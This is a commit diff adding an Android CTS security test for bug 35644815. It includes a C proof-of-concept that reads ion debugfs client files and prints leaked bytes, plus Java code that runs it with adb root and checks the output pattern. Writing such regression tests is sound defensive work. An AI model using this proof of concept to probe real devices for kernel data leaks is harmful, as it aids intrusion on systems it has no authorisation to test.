CTS/STS test for Android Security b/35644815
Bug: 35644815
Change-Id: Id72df9afb5b0195ebcdd1958c768bdf495e49916
diff --git a/hostsidetests/security/AndroidTest.xml b/hostsidetests/security/AndroidTest.xml
index a5ef24f..be415fa 100644
--- a/hostsidetests/security/AndroidTest.xml
+++ b/hostsidetests/security/AndroidTest.xml
@@ -85,6 +85,7 @@
<option name="push" value="Bug-35047780->/data/local/tmp/Bug-35047780" />
<option name="push" value="Bug-35047217->/data/local/tmp/Bug-35047217" />
<option name="push" value="Bug-35048450->/data/local/tmp/Bug-35048450" />
+ <option name="push" value="Bug-35644815->/data/local/tmp/Bug-35644815" />
<!--__________________-->
<!-- Bulletin 2017-07 -->
diff --git a/hostsidetests/security/securityPatch/Bug-35644815/Android.mk b/hostsidetests/security/securityPatch/Bug-35644815/Android.mk
new file mode 100644
index 0000000..1dd2950
--- /dev/null
+++ b/hostsidetests/security/securityPatch/Bug-35644815/Android.mk
@@ -0,0 +1,35 @@
+#Copyright (C) 2017 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+ include $(CLEAR_VARS)
+LOCAL_MODULE := Bug-35644815
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/Bug-35644815/poc.c b/hostsidetests/security/securityPatch/Bug-35644815/poc.c
new file mode 100644
index 0000000..d3482e0
--- /dev/null
+++ b/hostsidetests/security/securityPatch/Bug-35644815/poc.c
@@ -0,0 +1,130 @@
+/**
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#define _GNU_SOURCE
+#include <errno.h>
+#include <fcntl.h>
+#include <pthread.h>
+#include <sched.h>
+#include <signal.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <sys/ioctl.h>
+#include <sys/mman.h>
+#include <sys/stat.h>
+#include <sys/types.h>
+#include <unistd.h>
+// for syscall
+#include <sys/syscall.h>
+// for futex
+#include <linux/futex.h>
+#include <sys/time.h>
+// for opendir / readdir
+#include <dirent.h>
+
+#define LOG(fmt, ...) printf(fmt "\n", ##__VA_ARGS__)
+#define ERR(fmt, ...) \
+ printf(fmt ": %d(%s)\n", ##__VA_ARGS__, errno, strerror(errno))
+#define ARRAY_SIZE(a) (sizeof(a) / sizeof((a)[0]))
+
+static int set_affinity(int num) {
+ int ret = 0;
+ cpu_set_t mask;
+ CPU_ZERO(&mask);
+ CPU_SET(num, &mask);
+ ret = sched_setaffinity(0, sizeof(cpu_set_t), &mask);
+ if (ret == -1) {
+ ERR("[-] set affinity failed");
+ }
+ return ret;
+}
+
+struct ion_debugfs_handle_header {
+ unsigned int version;
+};
+
+struct ion_debugfs_handle_entry {
+ unsigned int heap_id;
+ size_t size;
+ unsigned int flags;
+ unsigned int handle_count;
+ size_t mapped_size;
+};
+
+struct ion_debugfs_handle {
+ struct ion_debugfs_handle_header hdr;
+ struct ion_debugfs_handle_entry entry;
+};
+
+#define TARGET "/sys/kernel/debug/ion/clients/pids/"
+int main(int argc, char *argv[]) {
+ int i, ret, tmpfd;
+ ssize_t rr;
+ char buf[PAGE_SIZE] = {0}, *p;
+ DIR *dir;
+ struct dirent *ent;
+ struct ion_debugfs_handle_header hdr = {0};
+ struct ion_debugfs_handle_entry entry = {0};
+ struct ion_debugfs_handle handle = {0};
+
+ /* bind_cpu */
+ set_affinity(0);
+
+ dir = opendir(TARGET);
+ if (dir == NULL) {
+ ERR("[-] opendir %s failed", TARGET);
+ return -1;
+ }
+
+ while (ent = readdir(dir)) {
+ if (ent->d_type != DT_REG) {
+ continue;
+ }
+
+ memset(buf, 0, PAGE_SIZE);
+ snprintf(buf, PAGE_SIZE, "%s%s", TARGET, ent->d_name);
+
+ tmpfd = open(buf, O_RDWR);
+
+ if (tmpfd == -1) {
+ continue;
+ }
+
+ rr = read(tmpfd, &hdr, sizeof(hdr));
+
+ for (;;) {
+ rr = read(tmpfd, &entry, sizeof(entry));
+ if (rr == 0) {
+ break;
+ }
+
+ if (rr != sizeof(entry)) {
+ break;
+ }
+
+ p = (char *)&entry;
+ p += sizeof(int);
+ printf("INFO DISC FLAG: ");
+ for (i = 0; i < sizeof(int); i++) {
+ printf("%x", p[i]);
+ }
+ }
+ close(tmpfd);
+ }
+ closedir(dir);
+ return 0;
+}
diff --git a/hostsidetests/security/src/android/security/cts/AdbUtils.java b/hostsidetests/security/src/android/security/cts/AdbUtils.java
index da7453e..7670e61 100644
--- a/hostsidetests/security/src/android/security/cts/AdbUtils.java
+++ b/hostsidetests/security/src/android/security/cts/AdbUtils.java
@@ -137,7 +137,8 @@
* @return boolean returns false if the test fails, otherwise returns true
**/
public static boolean detectInformationDisclosure(
- String pocName, ITestDevice device, int timeout, String pattern) throws Exception {
+ String pocName, ITestDevice device, int timeout,
+ String pattern) throws Exception {
String pocOutput = runPoc(pocName, device, timeout);
if (Pattern.matches(pattern, pocOutput))
diff --git a/hostsidetests/security/src/android/security/cts/Poc17_06.java b/hostsidetests/security/src/android/security/cts/Poc17_06.java
index 79c0123..27c787e 100644
--- a/hostsidetests/security/src/android/security/cts/Poc17_06.java
+++ b/hostsidetests/security/src/android/security/cts/Poc17_06.java
@@ -91,4 +91,15 @@
enableAdbRoot(getDevice());
AdbUtils.runPoc("Bug-35047217", getDevice(), 60);
}
+
+ /**
+ * b/35644815
+ */
+ @SecurityTest
+ public void testPocBug_35644815() throws Exception {
+ enableAdbRoot(getDevice());
+ infoDisclosure("Bug-35644815", getDevice(), 60,
+ "[\\s\\n\\S]*INFO DISC FLAG: 0000[\\s\\n\\S]*", false);
+ }
+
}
diff --git a/hostsidetests/security/src/android/security/cts/SecurityTestCase.java b/hostsidetests/security/src/android/security/cts/SecurityTestCase.java
index b3144e1..0f9da40 100644
--- a/hostsidetests/security/src/android/security/cts/SecurityTestCase.java
+++ b/hostsidetests/security/src/android/security/cts/SecurityTestCase.java
@@ -93,9 +93,11 @@
* Runs an info disclosure
**/
public void infoDisclosure(
- String pocName, ITestDevice device, int timeout, String pattern ) throws Exception {
+ String pocName, ITestDevice device, int timeout,
+ String pattern, boolean result) throws Exception {
- assertTrue("Pattern found. Info Disclosed.",
- AdbUtils.detectInformationDisclosure(pocName, device, timeout, pattern));
+ assertTrue("Pattern found.",
+ AdbUtils.detectInformationDisclosure
+ (pocName, device, timeout, pattern)==result );
}
}